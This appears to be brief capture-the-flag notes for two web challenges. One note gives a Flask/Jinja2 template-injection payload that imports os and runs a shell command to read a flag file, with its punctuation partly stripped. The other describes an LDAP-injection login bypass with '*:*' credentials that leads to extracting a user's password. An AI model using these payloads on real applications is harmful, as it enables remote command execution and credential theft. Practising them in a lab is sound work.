WEB Templeted Flask/Jinja2 Template Injection Flask/Jinja2 Template Injection Payload: <ip_address>/{{requestapplication__globals____builtins____import__('os')popen('cat flagtxt'))read()}} Phonebook LDAP Injection Bypass login using *:* credentials Get reese's password -> flag: